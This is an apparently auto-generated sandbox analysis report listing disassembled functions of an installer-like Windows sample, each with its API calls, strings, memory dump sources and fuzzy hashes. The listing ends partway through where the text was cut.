                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Message$TextWindow$A5940CurrentDispatchSendThreadTranslate
                                                                                • String ID: [Paused]
                                                                                • API String ID: 1715333840-4230553315
                                                                                • Opcode ID: a723b0617cbdde8b0455b730e79db8c0792bcf361dff27c4d69091156c9f8888
                                                                                • Instruction ID: cc82e29175726c0716c689c1ffa83d11e9869aeff1ced20ba9c80888b84e3111
                                                                                • Opcode Fuzzy Hash: a723b0617cbdde8b0455b730e79db8c0792bcf361dff27c4d69091156c9f8888
                                                                                • Instruction Fuzzy Hash: 013196309082489EDB11DBB5EC81FDEBBB8DB49314F5540B7F800E7292D67C9909CB69
                                                                                Function 0046B758 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCursor.USER32(00000000,0046B897), ref: 0046B814
                                                                                • LoadCursorA.USER32(00000000,00007F02), ref: 0046B822
                                                                                • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B897), ref: 0046B828
                                                                                • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B897), ref: 0046B832
                                                                                • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B897), ref: 0046B838
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Cursor$LoadSleep
                                                                                • String ID: CheckPassword
                                                                                • API String ID: 4023313301-1302249611
                                                                                • Opcode ID: 653d9654f76fc9f2c348947714f395caa5fd1a5bea1654e8e7fe328d35dfe1b3
                                                                                • Instruction ID: aec6a0205c5a75bc54f0fc291e1a1f9730d999611bc1887dd1e74dc6007ab6bd
                                                                                • Opcode Fuzzy Hash: 653d9654f76fc9f2c348947714f395caa5fd1a5bea1654e8e7fe328d35dfe1b3
                                                                                • Instruction Fuzzy Hash: 333164346406049FD711EB69C889F9E7BE4EF49304F5580B6F844DB3A2D778AD40CB99
                                                                                Function 00477B88 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 92windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00477AB0: GetWindowThreadProcessId.USER32(00000000), ref: 00477AB8
                                                                                  • Part of subcall function 00477AB0: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477BAF,0049C0A4,00000000), ref: 00477ACB
                                                                                  • Part of subcall function 00477AB0: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477AD1
                                                                                • SendMessageA.USER32(00000000,0000004A,00000000,00477F42), ref: 00477BBD
                                                                                • GetTickCount.KERNEL32 ref: 00477C02
                                                                                • GetTickCount.KERNEL32 ref: 00477C0C
                                                                                • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00477C61
                                                                                Strings
                                                                                • CallSpawnServer: Unexpected status: %d, xrefs: 00477C4A
                                                                                • CallSpawnServer: Unexpected response: $%x, xrefs: 00477BF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                                • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                                • API String ID: 613034392-3771334282
                                                                                • Opcode ID: 56bd6ace22e6e2035f5031cc9978de37ae905e15686cac3f17074c750df7538a
                                                                                • Instruction ID: 65d184c56696bd8d6baefe4a5ac293f093c2dd543b1706e930bc299cdf77f89e
                                                                                • Opcode Fuzzy Hash: 56bd6ace22e6e2035f5031cc9978de37ae905e15686cac3f17074c750df7538a
                                                                                • Instruction Fuzzy Hash: B131A474B042149ADB11EBB988867EEB6A09F48304F90C47AF548EB392D67C9E41879D
                                                                                Function 00459AE8 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 86libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 00459BA3
                                                                                Strings
                                                                                • CreateAssemblyCache, xrefs: 00459B9A
                                                                                • Fusion.dll, xrefs: 00459B43
                                                                                • .NET Framework CreateAssemblyCache function failed, xrefs: 00459BC6
                                                                                • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 00459BAE
                                                                                • Failed to load .NET Framework DLL "%s", xrefs: 00459B88
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc
                                                                                • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                                • API String ID: 190572456-3990135632
                                                                                • Opcode ID: edece01ff0b44ec29f5677049ed357158d3b305d3ba0728d372a41e2f192b5a4
                                                                                • Instruction ID: 1db31b6b51e2e068c3f61674d824012408e1fbc1d182cf764eafebb5ab4ea00f
                                                                                • Opcode Fuzzy Hash: edece01ff0b44ec29f5677049ed357158d3b305d3ba0728d372a41e2f192b5a4
                                                                                • Instruction Fuzzy Hash: EF318970E00619EBDB01EFA5C88169EB7B8AF44315F50857BE814E7382D738AE09C799
                                                                                Function 0041C158 Relevance: 10.6, APIs: 7, Instructions: 70windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0041C058: GetObjectA.GDI32(?,00000018), ref: 0041C065
                                                                                • GetFocus.USER32 ref: 0041C178
                                                                                • 73E9A570.USER32(?), ref: 0041C184
                                                                                • 73E98830.GDI32(?,?,00000000,00000000,0041C203,?,?), ref: 0041C1A5
                                                                                • 73E922A0.GDI32(?,?,?,00000000,00000000,0041C203,?,?), ref: 0041C1B1
                                                                                • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1C8
                                                                                • 73E98830.GDI32(?,00000000,00000000,0041C20A,?,?), ref: 0041C1F0
                                                                                • 73E9A480.USER32(?,?,0041C20A,?,?), ref: 0041C1FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: E98830$A480A570BitsE922FocusObject
                                                                                • String ID:
                                                                                • API String ID: 2688936647-0
                                                                                • Opcode ID: 32c019c2b17a625013bd7d07803e420f9d7b692fe3dc5f877fb11705181084ab
                                                                                • Instruction ID: a51b9c7cee13939b32e911f1849152ebfa7eb0d73570b73294f05c7218cf190f
                                                                                • Opcode Fuzzy Hash: 32c019c2b17a625013bd7d07803e420f9d7b692fe3dc5f877fb11705181084ab
                                                                                • Instruction Fuzzy Hash: A0116A71E40609BBDB10DBE9CC85FAFBBFCEF48700F54446AB518E7281D67899008B28
                                                                                Function 00418C64 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSystemMetrics.USER32(0000000E), ref: 00418C80
                                                                                • GetSystemMetrics.USER32(0000000D), ref: 00418C88
                                                                                • 6F9A2980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C8E
                                                                                  • Part of subcall function 004099C0: 6F99C400.COMCTL32(0049B628,000000FF,00000000,00418CBC,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004099C4
                                                                                • 6FA0CB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CDE
                                                                                • 6FA0C740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CE9
                                                                                • 6FA0CB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000), ref: 00418CFC
                                                                                • 6F9A0860.COMCTL32(0049B628,00418D1F,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E), ref: 00418D12
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: MetricsSystem$A0860A2980C400C740
                                                                                • String ID:
                                                                                • API String ID: 1086221473-0
                                                                                • Opcode ID: 33c04b7a68779a44c69ffbd8ad79940853ad3b201d45ee57610259a2e4dbeb77
                                                                                • Instruction ID: e0b43fe86d74620756cf035266125a11838772e9d6ef4bcae2e69295d5b8951d
                                                                                • Opcode Fuzzy Hash: 33c04b7a68779a44c69ffbd8ad79940853ad3b201d45ee57610259a2e4dbeb77
                                                                                • Instruction Fuzzy Hash: A11149B1744204BBEB10EBA9DC83F5E73B8DB48704F6044BAB604E72D2DB799D409759
                                                                                Function 004836EC Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,004837A4), ref: 00483789
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen
                                                                                • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                                • API String ID: 47109696-2530820420
                                                                                • Opcode ID: ae1742725748cd88b87d9fe0d1248e5a5e1a514a3c9083b9a236ca5d7aa17843
                                                                                • Instruction ID: 8316402a246994b7737153b66ed252a9f16b12b2be78e08e0fa98e077eb8f510
                                                                                • Opcode Fuzzy Hash: ae1742725748cd88b87d9fe0d1248e5a5e1a514a3c9083b9a236ca5d7aa17843
                                                                                • Instruction Fuzzy Hash: 0311B1B4704244AADB10FF65CC52B5E7AE9DB41B19F60C87BA400A7282EB38CA05875C
                                                                                Function 00494ED8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • 73E9A570.USER32(00000000,?,?,00000000), ref: 00494EE9
                                                                                  • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00494F0B
                                                                                • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00495489), ref: 00494F1F
                                                                                • GetTextMetricsA.GDI32(00000000,?), ref: 00494F41
                                                                                • 73E9A480.USER32(00000000,00000000,00494F6B,00494F64,?,00000000,?,?,00000000), ref: 00494F5E
                                                                                Strings
                                                                                • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00494F16
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
                                                                                • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                • API String ID: 1435929781-222967699
                                                                                • Opcode ID: f7d6f97b91dc48adac3cf3527b9ba73e93ee7bba49e4f60ed72cccac08d23d6d
                                                                                • Instruction ID: 6f18d4fe6cef93123b0455e30b82395b7dbfc0c8f911bccc88a8e51c4d6277b1
                                                                                • Opcode Fuzzy Hash: f7d6f97b91dc48adac3cf3527b9ba73e93ee7bba49e4f60ed72cccac08d23d6d
                                                                                • Instruction Fuzzy Hash: 95018476A04609BFEB00DBA9CC41F5EB7ECDB89704F51447AB600E7281D678AE018B28
                                                                                Function 0041B472 Relevance: 10.6, APIs: 7, Instructions: 57windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                                                • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                                                • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                                                • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                                                • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                                                • DeleteDC.GDI32(?), ref: 0041B4E9
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ObjectSelect$Delete$Stretch
                                                                                • String ID:
                                                                                • API String ID: 1458357782-0
                                                                                • Opcode ID: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                                                • Instruction ID: 28529174ed8a1a36c66279ad8c479dcd7ed434ba0fbaa502c63cdd0cc078bbc5
                                                                                • Opcode Fuzzy Hash: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                                                • Instruction Fuzzy Hash: A1114C72E40559ABDF10D6D9D885FAFB3BCEF08704F048456B614FB241C678A8418B54
                                                                                Function 004233A4 Relevance: 10.6, APIs: 7, Instructions: 56threadwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCursorPos.USER32 ref: 004233BF
                                                                                • WindowFromPoint.USER32(?,?), ref: 004233CC
                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233DA
                                                                                • GetCurrentThreadId.KERNEL32 ref: 004233E1
                                                                                • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233FA
                                                                                • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423411
                                                                                • SetCursor.USER32(00000000), ref: 00423423
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                • String ID:
                                                                                • API String ID: 1770779139-0
                                                                                • Opcode ID: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
                                                                                • Instruction ID: 219e0d69ac6b6a38dcb61baa39fbc914f783b163521ae56cddb293ea60412e1c
                                                                                • Opcode Fuzzy Hash: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
                                                                                • Instruction Fuzzy Hash: E601D42230472036D6217B795C86E2F26A8CFC5B15F50457FB649BB283DA3D8C0063BD
                                                                                Function 004019CC Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                • String ID: LUm$x?m
                                                                                • API String ID: 730355536-1028250771
                                                                                • Opcode ID: 0971dfa849a4ffc4cae04a3e1ff9e59bd0eaa306d87ad714f1f0155365df5b79
                                                                                • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                                                • Opcode Fuzzy Hash: 0971dfa849a4ffc4cae04a3e1ff9e59bd0eaa306d87ad714f1f0155365df5b79
                                                                                • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                                                Function 00494CFC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(user32.dll), ref: 00494D0C
                                                                                • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00494D19
                                                                                • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00494D26
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModule
                                                                                • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                                • API String ID: 667068680-2254406584
                                                                                • Opcode ID: 70207861a9ddbbfcf1ec4c2ebf1ed82301f215222d5c3051e71e037128298d5d
                                                                                • Instruction ID: 42226921e916c2e61715a17367c32eae2b2292ab525ca03b869d6a68ec0a34c4
                                                                                • Opcode Fuzzy Hash: 70207861a9ddbbfcf1ec4c2ebf1ed82301f215222d5c3051e71e037128298d5d
                                                                                • Instruction Fuzzy Hash: 6CF0F69AB41B1466DA2025B68C81F7B698CCFD1B71F050337BE04A7382ED9D8D0642AD
                                                                                Function 0045D9EC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D9F5
                                                                                • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045DA05
                                                                                • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045DA15
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc
                                                                                • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                                • API String ID: 190572456-212574377
                                                                                • Opcode ID: 01040e06415ef817a4763b016626a28be3372e477bb5bd5db3809bf0997a53ea
                                                                                • Instruction ID: e47ea2fb967bc5a05fa6d8d3c64fcba096cc564050e4d812c51f788cc71ed1ca
                                                                                • Opcode Fuzzy Hash: 01040e06415ef817a4763b016626a28be3372e477bb5bd5db3809bf0997a53ea
                                                                                • Instruction Fuzzy Hash: 2BF030B0D05300DFEB24DFB29CC372336959BA4316F14803B9A0D96267D278088CCE2C
                                                                                Function 0042EA2C Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30libraryloaderwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,00457029,004573CC,00456F80,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,00480D8E), ref: 0042EA45
                                                                                • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA4B
                                                                                • InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA5C
                                                                                  • Part of subcall function 0042E9BC: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA80,00000004,00499934,00457029,004573CC,00456F80,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9D2
                                                                                  • Part of subcall function 0042E9BC: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9D8
                                                                                  • Part of subcall function 0042E9BC: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9E9
                                                                                • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,00457029,004573CC,00456F80,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA70
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
